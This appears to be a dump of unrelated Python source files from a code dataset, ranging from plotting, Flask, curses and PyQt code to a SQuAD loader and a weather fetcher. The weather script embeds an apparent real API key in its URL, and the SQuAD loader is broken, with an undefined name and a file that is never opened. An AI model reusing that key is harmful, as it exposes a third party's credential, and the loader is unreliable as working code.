'fig-introduction-spence-surplus-canvas.png'\n\n else:\n ax = align_plots(ax, 'Surplus', ylim=[-2, 2], y_star=y_star)\n fname = 'fig-introduction-spence-surplus.png'\n\n y_values = dict()\n for group in ['low', 'high']:\n surplus_analysis = partial(surplus_education, group, y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n\n y_values[group] = surplus_analysis(x_values)\n\n x_values_ma = np.ma.masked_where(\n (x_values < y_star + 0.005) & (x_values > y_star - 0.005),\n x_values)\n\n ax.plot(x_values_ma, y_values[group], label=group + ' productivity')\n\n ax.legend()\n\n plt.savefig(fname)\n\n\nif __name__ == '__main__':\n\n x_values = np.linspace(0, 3, 1000)\n\n ax = plt.figure().add_subplot(111)\n ax = align_plots(ax, 'Cost', y_star=1.25)\n\n y_values = dict()\n linestyles = [':', '-']\n\n for i, group in enumerate(['low', 'high']):\n benefit_analysis = partial(cost_education, group)\n benefit_analysis = np.vectorize(benefit_analysis)\n\n y_values[group] = benefit_analysis(x_values)\n\n ax.plot(x_values, y_values[group], label=group + ' productivity', linestyle=linestyles[i])\n\n ax.yaxis.get_major_ticks()[0].set_visible(False)\n ax.legend(fontsize=25)\n plt.savefig('fig-introduction-spence-cost.png')\n\n ax = plt.figure().add_subplot(111)\n ax = align_plots(ax, 'Wage', y_star=1.25)\n\n y_star, y_values = 1.25, dict()\n benefit_analysis = partial(benefit_education, y_star)\n benefit_analysis = np.vectorize(benefit_analysis)\n\n y_values[group] = benefit_analysis(x_values)\n x_values_ma = np.ma.masked_where((x_values < 1.255) & (x_values > 1.2495), x_values)\n\n ax.plot(x_values_ma, y_values[group])\n\n plt.savefig('fig-introduction-spence-benefit.png')\n\n # This is the material for the question on market structure.\n y_star = 1.25\n plots_market_structure(y_star)\n\n # This is the material for the question on the surplus.\n y_star = 1.25\n plots_surplus(y_star)\n","sub_path":"tutorial/figures/fig-introduction.py","file_name":"fig-introduction.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"72997833","text":"from app import app\nfrom flask import request, jsonify, render_template\nfrom app import lib\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n # assign \"bio\" request variable\n if request.method == \"GET\":\n bio = request.args.get(\"bio\")\n elif request.method == \"POST\":\n bio = request.form[\"bio\"]\n else:\n return jsonify(error=\"Invalid request method\"), 400\n\n # check that the request variable exists\n if bio is None:\n return jsonify(error=\"Biology text should be submitted as \\\"bio\\\" request variable\"), 400\n\n # translate it!\n bio_lower = lib.translate(bio)\n\n # return it\n context = {\n \"bio\": bio,\n \"eng\": bio_lower\n }\n return jsonify(**context)\n\n\n@app.route('/example/')\ndef example():\n return render_template('example.html')\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"636544151","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: liusir\n# @file: re_demo_17.py\n# @time: 2020/9/20 5:01 下午\n\nimport re\n\n# 正则表达式模块 1、字符模版的含义 2、方法太杂\n\n# 写法一:利用re模块的函数去匹配\nsource_str = 'python3classggfdgfdgfderewrwe'\nvalue = re.search( 'python\\d',source_str ).group()\nprint( value )\n\n#写法二:利用正则表达式对象处理\nreg_obj = re.compile('python\\d')\nvalue1 = reg_obj.search(source_str).group()\nprint( value1 )\n\ntitle_str = '新梦想_软件测试培训_Java培训_Python培训_长沙新梦想IT教育'\nreg_obj_01 = re.compile('t+')\nresult = reg_obj_01.findall(title_str)\nprint( result )\n\nresult1 = re.findall('(.+?)',title_str)[0]\nprint( result1 )\n\n\n\n\n\n\n\n","sub_path":"courest_pritices/20200920/re_demo_17.py","file_name":"re_demo_17.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"537568981","text":"from threading import Thread\r\nimport json\r\nimport requests\r\nimport datetime\r\n\r\nclass WeatherGetter (Thread):\r\n def __init__(self, city):\r\n self.city = city\r\n \r\n def cityLocator(self):\r\n self.loc = 'https://www.google.co.uk/maps/place/'+ self.lon + self.lat\r\n\r\n def writeToFile(self):\r\n fout = open('weather.txt','a')\r\n daymon = datetime.datetime.now().strftime(\"%d %b \")\r\n timenow = datetime.datetime.now().strftime(\"%H:%M\")\r\n stamp = daymon + timenow\r\n text = '\\n{}: {}\\n'.format(self.city.title(),self.loc)\r\n text += '[{}] Weather is {}. Temperature is {}C feels like {}C with a windspeed of {}mph'.format(stamp, self.cond, self.temp, self.feel, self.wspd)\r\n print(text, file=fout)\r\n fout.close()\r\n\r\n def run(self):\r\n url = 'https://api.openweathermap.org/data/2.5/weather?q=' + self.city + '&units=metric&APPID=48f2d5e18b0d2bc50519b58cce6409f1'\r\n res = requests.get(url)\r\n #print (res.text)\r\n data = json.loads(res.text)\r\n\r\n self.lon = data['coord']['lon']\r\n self.lat = data['coord']['lat']\r\n self.loc = 'https://www.google.co.uk/maps/place/' + str(self.lon) + ',' + str(self.lat)\r\n\r\n self.temp = data['main']['temp']\r\n self.feel = data['main']['feels_like']\r\n self.cond = data['weather'][0]['description']\r\n self.wspd = data['wind']['speed']\r\n\r\n self.writeToFile()\r\n\r\nif __name__ == '__main__':\r\n cities = ['athlone','belfast','cork','dublin','edenderry','frankfurt','galway','houston','istanbul','jakarta','kolkata','london','mumbai','nairobi','ottawa','paris','quebec']\r\n t1 = float(datetime.datetime.now().strftime(\"%S\"))\r\n for c in cities:\r\n wg = WeatherGetter(c)\r\n wg.run()\r\n t2 = float(datetime.datetime.now().strftime(\"%S\"))\r\n print('Weather data retrieved in {}sec'.format(t2-t1))","sub_path":"pybeyond/review2/weathergetter.py","file_name":"weathergetter.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"608899453","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom uuid import uuid4\nimport sys\nfrom flask import current_app, session\n\nfrom eduid_userdb import User\nfrom eduid_userdb.dashboard import DashboardUser\nfrom eduid_userdb.proofing import ProofingUser\nfrom eduid_userdb.exceptions import UserDBValueError, EduIDUserDBError\nfrom eduid_userdb.exceptions import UserDoesNotExist, MultipleUsersReturned\nfrom eduid_common.api.exceptions import ApiException\n\nPY3 = sys.version_info[0] == 3\n\nif PY3: # pragma: no cover\n text_type = str\n from io import StringIO\nelse: # pragma: no cover\n text_type = unicode\n from StringIO import StringIO\n\n\ndef get_unique_hash():\n return text_type(uuid4())\n\n\ndef get_short_hash(entropy=10):\n return uuid4().hex[:entropy]\n\n\ndef update_modified_ts(user):\n \"\"\"\n When loading a user from the central userdb, the modified_ts has to be\n loaded from the private userdb (since it is not propagated to 'attributes'\n by the eduid-am worker).\n\n This need should go away once there is a global version number on the user document.\n\n :param user: User object from the central userdb\n :type user: eduid_userdb.User\n\n :return: None\n \"\"\"\n try:\n userid = user.user_id\n except UserDBValueError:\n current_app.logger.debug(\"User {!s} has no id, setting modified_ts to None\".format(user))\n user.modified_ts = None\n return\n \n private_user = current_app.private_userdb.get_user_by_id(userid, raise_on_missing=False)\n if private_user is None:\n current_app.logger.debug(\"User {!s} not found in {!s}, \"\n \"setting modified_ts to None\".format(user, current_app.private_userdb))\n user.modified_ts = None\n return\n\n if private_user.modified_ts is None:\n private_user.modified_ts = True # use current time\n current_app.logger.debug(\"Updating user {!s} with new modified_ts: {!s}\".format(\n private_user, private_user.modified_ts))\n current_app.private_userdb.save(private_user, check_sync = False)\n\n user.modified_ts = private_user.modified_ts\n current_app.logger.debug(\"Updating {!s} with modified_ts from central userdb user {!s}: {!s}\".format(\n user, private_user, private_user.modified_ts))\n\n\ndef get_user():\n \"\"\"\n :return: Central userdb user\n :rtype: eduid_userdb.user.User\n \"\"\"\n eppn = session.get('user_eppn', None)\n if not eppn:\n raise ApiException('Not authorized', status_code=401)\n try:\n # Get user from central database\n return current_app.central_userdb.get_user_by_eppn(eppn, raise_on_missing=True)\n except UserDoesNotExist as e:\n current_app.logger.error('Could not find user in central database.')\n current_app.logger.error(e)\n raise ApiException('Not authorized', status_code=401)\n except MultipleUsersReturned as e:\n current_app.logger.error('Found multiple users in central database.')\n current_app.logger.error(e)\n raise ApiException('Not authorized', status_code=401)\n\n\ndef save_and_sync_user(user):\n \"\"\"\n Save (new) user object to the private userdb and propagate the changes to the central user db.\n\n May raise UserOutOfSync exception\n\n :param user: the modified user\n :type user: current_app.private_userdb.UserClass\n \"\"\"\n if not isinstance(user, current_app.private_userdb.UserClass):\n raise EduIDUserDBError('user is not of type {}'.format(current_app.private_userdb.UserClass))\n current_app.private_userdb.save(user)\n return current_app.am_relay.request_user_sync(user)\n\n\ndef urlappend(base, path):\n \"\"\"\n :param base: Base url\n :type base: str\n :param path: Path to join to base\n :type path: str\n :return: Joined url\n :rtype: str\n\n Used instead of urlparse.urljoin to append path to base in an obvious way.\n\n >>> urlappend('https://test.com/base-path', 'my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path/', 'my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path/', '/my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path', '/my-path')\n 'https://test.com/base-path/my-path'\n >>> urlappend('https://test.com/base-path', '/my-path/')\n 'https://test.com/base-path/my-path/'\n \"\"\"\n path = path.lstrip('/')\n if not base.endswith('/'):\n base = '{!s}/'.format(base)\n return '{!s}{!s}'.format(base, path)\n\n\ndef get_flux_type(req, suffix):\n \"\"\"\n :param req: flask request\n :type req: flask.request\n :param suffix: SUCCESS|FAIL|?\n :type suffix: str|unicode\n :return: Flux type\n :rtype: str|unicode\n \"\"\"\n method = req.method\n blueprint = req.blueprint\n # Remove APPLICATION_ROOT from request url rule\n # XXX: There must be a better way to get the internal path info\n app_root = current_app.config['APPLICATION_ROOT']\n if app_root is None:\n app_root = ''\n url_rule = req.url_rule.rule.replace(app_root, '')\n url_rule = url_rule.replace('/', ' ').replace('-', ' ')\n url_rule = re.sub(r'<.+?>', '', url_rule)\n flux_type = '_'.join('{!s} {!s} {!s} {!s}'.format(method, blueprint, url_rule, suffix).split()).upper()\n return flux_type\n\n\ndef init_template_functions(app):\n\n @app.template_global()\n def static_url_for(f):\n return urlappend(current_app.config['EDUID_STATIC_URL'], f)\n\n return app\n","sub_path":"src/eduid_common/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290658063","text":"import curses, locale\n\nfrom rects import rect\n\nfull_cards = [\n\t[\n\t\t\" x\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \",\n\t\t\"x \"\n\t], [\n\t\t\" x\",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\"x \"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"xxx\",\n\t\t\" \",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"x x\",\n\t\t\" \",\n\t\t\"x x\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"x x\",\n\t\t\" x \",\n\t\t\"x x\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\" \",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\" x \",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\"x x\",\n\t\t\"xxx\",\n\t\t\"xxx\",\n\t\t\"xxx\",\n\t\t\"x x\"\n\t], [\n\t\t\" \",\n\t\t\" \",\n\t\t\" x \",\n\t\t\" \",\n\t\t\" \"\n\t]\n]\n\nrankstrings = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nsuitstrings = [s.encode(locale.getpreferredencoding()) for s in [u'\\u2660', u'\\u2665', u'\\u2666', u'\\u2663']]\nsuitcolors = [2, 1, 1, 2]\n\nclass Rank:\n\tdef __init__(self, rank):\n\t\tif isinstance(rank, basestring):\n\t\t\tself.ranknum = rankstrings.index(rank)\n\t\telif isinstance(rank, int):\n\t\t\tassert 0 <= rank < 13\n\t\t\tself.ranknum = rank\n\t\telse:\n\t\t\tself.ranknum = rank.ranknum\n\tdef icon(self):\n\t\treturn rankstrings[self.ranknum]\n\tdef face(self):\n\t\tface = []\n\t\ticon = self.icon()\n\t\ticon_padding = ' ' * (7 - len(icon))\n\t\tface.append(icon + icon_padding)\n\t\tface.extend([' ' + ' '.join(s) + ' ' for s in full_cards[self.ranknum]])\n\t\tface.append(icon_padding + icon)\n\t\treturn face\n\tdef __cmp__(self, other):\n\t\treturn self.ranknum - other.ranknum\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n\nclass Suit:\n\tdef __init__(self, suit):\n\t\tif isinstance(suit, basestring):\n\t\t\tself.suitnum = suitstrings.index(suit)\n\t\telif isinstance(suit, int):\n\t\t\tassert 0 <= suit < 4\n\t\t\tself.suitnum = suit\n\t\telse:\n\t\t\tself.suitnum = suit.suitnum\n\tdef icon(self):\n\t\treturn suitstrings[self.suitnum]\n\tdef color(self):\n\t\treturn curses.color_pair(suitcolors[self.suitnum])\n\tdef __cmp__(self, other):\n\t\treturn self.suitnum - other.suitnum\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n\nranks = [Rank(x) for x in xrange(13)]\nsuits = [Suit(x) for x in xrange(4)]\nspades, hearts, diamonds, clubs = suits\n\nclass Card:\n\t\"\"\"A card in a 52-card deck that can be drawn to the screen.\"\"\"\n\tdef __init__(self, rank, suit):\n\t\tself.rank = Rank(rank)\n\t\tself.suit = Suit(suit)\n\tdef icon(self):\n\t\treturn self.rank.icon() + self.suit.icon()\n\tdef draw(self, win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 9, 9)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\ti = 1\n\t\t\tfor line in self.rank.face():\n\t\t\t\tsub.addstr(i, 1, line.replace('x', self.suit.icon()))\n\t\t\t\ti += 1\n\t\telse:\n\t\t\tfor i in xrange(7):\n\t\t\t\tsub.addstr(i + 1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 7)\n\tdef draw_small_h(self, win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 9, 4)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\tsub.addstr(1, 1, self.rank.icon())\n\t\t\tsub.addstr(2, 1, self.suit.icon())\n\t\telse:\n\t\t\tfor i in xrange(7):\n\t\t\t\tsub.addstr(i + 1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 2)\n\tdef draw_small_v(self, win, y, x, visible=True):\n\t\tsub = rect(win, y, x, 3, 9)\n\t\tsub.attron(curses.A_BOLD)\n\t\tif visible:\n\t\t\tsub.attron(self.suit.color())\n\t\t\tsub.addstr(1, 1, self.icon())\n\t\telse:\n\t\t\tsub.addstr(1, 1, u'\\u2573'.encode(locale.getpreferredencoding()) * 7)\n\tdef __cmp__(self, other):\n\t\tc = self.suit.__cmp__(other.suit)\n\t\tif c != 0: return c\n\t\treturn self.rank.__cmp__(other.rank)\n\tdef __eq__(self, other):\n\t\treturn self.__cmp__(other) == 0\n","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"128683116","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n编码问题\npython2中str和unicode\npython3中bytes和str\n其中前者都是八位值,后者都是unicode,python2中和pythn3中初始化一个字符串都是一个str类型的,\npython中程序核心的编码使用utf-8,所以在python2中需要将字符串都统一成unicode的形式,str解码(decode)到unicode,\npython3中也是同样的道理,bytes也是需要解码到unicode的\n\n\"\"\"\n\ndef to_str(bytes_or_str):\n if isinstance(bytes_or_str, bytes):\n value = bytes_or_str.decode(\"utf-8\")\n else:\n value = bytes_or_str\n return value\n\n\ndef to_bytes(bytes_or_str):\n if isinstance(bytes_or_str, str):\n value = bytes_or_str.encode(\"utf-8\")\n else:\n value = bytes_or_str\n return value\n\n\nif __name__ == '__main__':\n a = \"hello world\"\n b = to_str(a)\n print(b)\n c = to_bytes(b)\n print(b)\n","sub_path":"python/effectivePython/item3.py","file_name":"item3.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"485406729","text":"import os\nimport json\nfrom torchnlp.download import download_files_maybe_extract\n\ndef squad_dataset(directory='data/',\n\t\t\t\t train=False,\n\t\t\t\t dev=False,\n\t\t\t\t train_filename='train-v2.0.json',\n\t\t\t\t dev_filename='dev-v2.0.json',\n\t\t\t\t check_files=['train-v2.0.json',\n\t\t\t\t \t\t\t\t'dev-v2.0.json'],\n\t\t\t\t urls=[\n\t\t\t\t \t\t'https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v2.0.json',\n\t\t\t\t \t\t'https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v2.0.json'\n\t\t\t\t \t\t],\n\t\t\t\t fine_grained=False):\n\t\"\"\"\n\t\n\tLoad the Stanford Question Answering Dataset (SQuAD) dataset.\n\n\tStanford Question Answering Dataset (SQuAD) is a reading comprehension dataset, consisting of questions \n\tposed by crowdworkers on a set of Wikipedia articles, where the answer to every question is a segment \n\tof text, or span, from the corresponding reading passage, or the question might be unanswerable.\n\n\tSQuAD2.0 combines the 100,000 questions in SQuAD1.1 with over 50,000 unanswerable questions written \n\tadversarially by crowdworkers to look similar to answerable ones. To do well on SQuAD2.0, systems must \n\tnot only answer questions when possible, but also determine when no answer is supported by the paragraph \n\tand abstain from answering.\n\t\n\t**Reference:** https://rajpurkar.github.io/SQuAD-explorer/\n\n\t**Citation:** \n\tRajpurkar, P., Jia, R. and Liang, P., 2018. Know what you don't know: Unanswerable questions for SQuAD. \n\tarXiv preprint arXiv:1806.03822.\n\n\tArgs:\n\t\tdirectory (str, optional): Directory to cache the dataset.\n train (bool, optional): If to load the training split of the dataset.\n dev (bool, optional): If to load the development split of the dataset.\n test (bool, optional): If to load the test split of the dataset.\n train_filename (str, optional): The filename of the training split.\n dev_filename (str, optional): The filename of the development split.\n test_filename (str, optional): The filename of the test split.\n extracted_name (str, optional): Name of the extracted dataset directory.\n check_files (str, optional): Check if these files exist, then this download was successful.\n url (str, optional): URL of the dataset `.json` file.\n\n\n Returns:\n :class:`tuple` of :class:`iterable` or :class:`iterable`:\n Returns between one and all dataset splits (train, dev and test) depending on if their\n respective boolean argument is ``True``.\n\n Example:\n >>> from torchnlp.datasets import squad_dataset # doctest: +SKIP\n >>> train = snli_dataset(train=True) # doctest: +SKIP\n >>> train[0:2] # doctest: +SKIP\n [{\n 'question': 'In what country is Normandy located?', \n 'answer': ['France', 'France', 'France', 'France']\n }, {\n 'question': 'When were the Normans in Normandy?', \n 'answer': ['10th and 11th centuries', 'in the 10th and 11th centuries', \n '10th and 11th centuries', '10th and 11th centuries']\n }]\n\n\t\"\"\"\n\n\tdownload_files_maybe_extract(urls=urls, directory=directory, check_files=check_files)\n\n\tret = []\n\tsplits = [(train, train_filename), (dev, dev_filename)]\n\tsplits = [f for (requested, f) in splits if requested]\n\tfor filename in splits:\n\t\tfull_path = os.path.join(directory, extracted_name, filename)\n\t\texamples = []\n\t\tdataset = json.load(f)\n\n\t\tfor article in dataset['data']:\n\t\t\tfor paragraph in article['paragraphs']:\n\t\t\t\tfor qa in paragraph['qas']:\n\t\t\t\t\tquestion = qa['question']\n\t\t\t\t\tanswer = [a['text'] for a in qa['answers']]\n\t\t\t\t\texamples.append({\n\t\t\t\t\t'question' : question,\n\t\t\t\t\t'answer' : answer\n\t\t\t\t\t})\n\t\tret.append(examples)\n\n\tif(len(ret)==1):\n\t\treturn ret[0]\n\telse:\n\t\treturn tuple(ret)","sub_path":"torchnlp/datasets/squad.py","file_name":"squad.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"254313496","text":"#############################################\n# Generating pdbqts from mol2 using MGLTools#\n#############################################\n\n# Usage: python mol2pdbqt.py num_processes\n\nimport glob\nfrom multiprocessing import Pool\nimport os\nfrom subprocess import call\nimport sys\nimport time\n\n# MGLTools environment\nPIPELINE_DIR = os.path.dirname(os.path.realpath(__file__))\nos.environ['MGL_ROOT'] = PIPELINE_DIR + \"/MGLTools\"\n\n \ndef convert2pdbqt(ligand):\n \"\"\"Uses MGLTools to convert a ligand to pdbqt.\"\"\"\n root_name = os.path.splitext(ligand)[0]\n # Split ligand\n call([\"MGLTools/bin/pythonsh\",\n \"MGLTools/MGLToolsPckgs/AutoDockTools/Utilities24/prepare_ligand4.py\",\n \"-l\", ligand, \"-o\", root_name + \".pdbqt\"])\n\n\nif __name__ == \"__main__\":\n # User inputs\n target_path = sys.argv[1].rstrip(\"/\")\n n_cpus = int(sys.argv[2])\n # Generate list of ligands\n actives = glob.glob(target_path + \"/actives/*.mol2\")\n decoys = glob.glob(target_path + \"/decoys/*.mol2\")\n ligands = actives + decoys\n # Start process pool\n pool = Pool(processes=n_cpus)\n start_time = time.time()\n # Run for each ligand\n pool.map(convert2pdbqt, ligands)\n stop_time = time.time()\n print(\"Job completed in:\", stop_time - start_time, \"seconds\")\n","sub_path":"docking/mol2pdbqt.py","file_name":"mol2pdbqt.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623401578","text":"\"\"\"\r\n\r\nput functions at the top of the program\r\n\r\n\"\"\"\r\n\r\ndef fahrenheit(celsius):\r\n '''Returns the input Celsius degress in Fahrenheit'''\r\n \r\n return 9/5*celsius+32\r\n\r\ndef celsius(fahrenheit):\r\n '''Returns the input Fahrenheit degrees in Celsius'''\r\n return 5/9*(fahrenheit-32)\r\n\r\n''' call the function below the function definition'''\r\n\r\nc = float(input('Enter degrees in Celsius: '))\r\n''' input always returns a string to the computer'''\r\n\r\nf = fahrenheit(c)\r\n# You can print multiple items in one statement. If you put a comma after each\r\n# item, it prints a space and then goes on to print the next item. \r\n\r\nprint(c, \"C = \", f, 'F')\r\n\r\n# you can print this way too, but allowing exactly two decimal places.\r\n\r\nprint('%.2f C = %.2f F' %(c,f))\r\n#percent means you are going to have a placeholder\r\nf = float(input('Enter degrees in Fahrenheit: '))\r\nc = celsius(f)\r\n\r\nprint(f,'F =',c,'C')\r\nprint('%.2f F = %.2f C')\r\n\r\n'''\r\ntry composition of functions\r\nconverting a fahrenheit temperature to celsius and then back to fahrenheit should\r\ngive you the original fahrenheit temperature\r\n'''\r\n\r\nprint() # print by itself\r\nf = float(input('Enter degrees in Fahrenheit: '))\r\n\r\n#use assert to check that the returned value is equal to the expected value.\r\nassert(fahrenheit(celsius(f))) == f\r\n# no output should be produced unless the assertion fails.\r\n\r\n\r\n\r\n","sub_path":"temp_conversion.py","file_name":"temp_conversion.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348849401","text":"import sys\nimport time\nfrom threading import Thread\n#import obd\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n self.setupUi(self)\n \n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(480, 320)\n MainWindow.setMinimumSize(QtCore.QSize(320, 240))\n MainWindow.setMaximumSize(QtCore.QSize(480, 320))\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n MainWindow.setFont(font)\n MainWindow.setStyleSheet(\"background-color: rgb(0, 0, 0);\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.rpm_val = QtWidgets.QLCDNumber(self.centralwidget)\n self.rpm_val.setGeometry(QtCore.QRect(200, 30, 131, 71))\n self.rpm_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.rpm_val.setProperty(\"intValue\", 13000)\n self.rpm_val.setObjectName(\"rpm_val\")\n self.speed_val = QtWidgets.QLCDNumber(self.centralwidget)\n self.speed_val.setGeometry(QtCore.QRect(20, 20, 161, 81))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.speed_val.setFont(font)\n self.speed_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.speed_val.setDigitCount(3)\n self.speed_val.setProperty(\"intValue\", 100)\n self.speed_val.setObjectName(\"speed_val\")\n self.mileage_val = QtWidgets.QLCDNumber(self.centralwidget)\n self.mileage_val.setGeometry(QtCore.QRect(0, 190, 201, 41))\n self.mileage_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.mileage_val.setDigitCount(6)\n self.mileage_val.setProperty(\"intValue\", 350000)\n self.mileage_val.setObjectName(\"mileage_val\")\n self.fuel_val = QtWidgets.QProgressBar(self.centralwidget)\n self.fuel_val.setGeometry(QtCore.QRect(390, 40, 41, 201))\n self.fuel_val.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.fuel_val.setProperty(\"value\", 24)\n self.fuel_val.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)\n self.fuel_val.setTextVisible(True)\n self.fuel_val.setOrientation(QtCore.Qt.Vertical)\n self.fuel_val.setInvertedAppearance(False)\n self.fuel_val.setObjectName(\"fuel_val\")\n self.speed = QtWidgets.QLabel(self.centralwidget)\n self.speed.setGeometry(QtCore.QRect(40, 110, 141, 31))\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(17)\n font.setBold(True)\n font.setItalic(False)\n font.setWeight(75)\n self.speed.setFont(font)\n self.speed.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.speed.setFrameShadow(QtWidgets.QFrame.Plain)\n self.speed.setLineWidth(8)\n self.speed.setTextFormat(QtCore.Qt.AutoText)\n self.speed.setObjectName(\"speed\")\n self.rpm = QtWidgets.QLabel(self.centralwidget)\n self.rpm.setGeometry(QtCore.QRect(240, 110, 111, 31))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.rpm.setFont(font)\n self.rpm.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.rpm.setObjectName(\"rpm\")\n self.fuel = QtWidgets.QLabel(self.centralwidget)\n self.fuel.setGeometry(QtCore.QRect(360, 250, 111, 20))\n font = QtGui.QFont()\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.fuel.setFont(font)\n self.fuel.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.fuel.setObjectName(\"fuel\")\n self.mileage = QtWidgets.QLabel(self.centralwidget)\n self.mileage.setGeometry(QtCore.QRect(60, 240, 91, 31))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.mileage.setFont(font)\n self.mileage.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.mileage.setObjectName(\"mileage\")\n self.alerts_val = QtWidgets.QTextBrowser(self.centralwidget)\n self.alerts_val.setGeometry(QtCore.QRect(210, 170, 121, 71))\n self.alerts_val.setStyleSheet(\"color: rgb(255, 170, 0);\")\n self.alerts_val.setObjectName(\"alerts_val\")\n self.alerts = QtWidgets.QLabel(self.centralwidget)\n self.alerts.setGeometry(QtCore.QRect(230, 250, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(17)\n font.setBold(True)\n font.setWeight(75)\n self.alerts.setFont(font)\n self.alerts.setStyleSheet(\"color: rgb(255, 255, 255);\")\n self.alerts.setObjectName(\"alerts\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n##################################################### For QA\n th = Thread(target=self.instrument_readings) #progress bar moves\n th.start()\n##################################################################\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.speed.setText(_translate(\"MainWindow\", \"MPH\"))\n self.rpm.setText(_translate(\"MainWindow\", \"RPM\"))\n self.fuel.setText(_translate(\"MainWindow\", \"Fuel Level\"))\n self.mileage.setText(_translate(\"MainWindow\", \"Mileage\"))\n self.alerts_val.setHtml(_translate(\"MainWindow\", \"\\n\"\n\"\\n\"\n\"

Check Engine

